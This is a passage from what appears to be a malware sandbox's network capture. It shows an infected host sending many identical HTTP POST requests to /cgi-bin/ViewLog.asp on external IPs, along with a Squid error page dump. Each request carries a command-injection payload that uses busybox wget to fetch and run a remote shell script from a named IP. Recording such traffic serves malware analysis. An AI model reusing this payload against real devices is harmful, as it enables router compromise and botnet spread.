                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      129192.168.2.154136431.136.116.2528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.032653093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:10.650758028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:11.898724079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.522563934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.642450094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:29.626437902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.105648041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.064544916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      130192.168.2.154570431.136.16.2118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.032785892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:10.650738001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:11.898744106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.522547007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.642435074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:29.626327038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.105628967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.064558983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      131192.168.2.153889431.136.105.1638080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.034320116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:10.650736094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:11.898765087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.522550106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.642450094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:29.626437902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.105617046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.064544916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      132192.168.2.155203894.121.72.948080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.076415062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      133192.168.2.154359294.122.18.2288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.079962015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      134192.168.2.154558294.123.187.2418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.080327034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
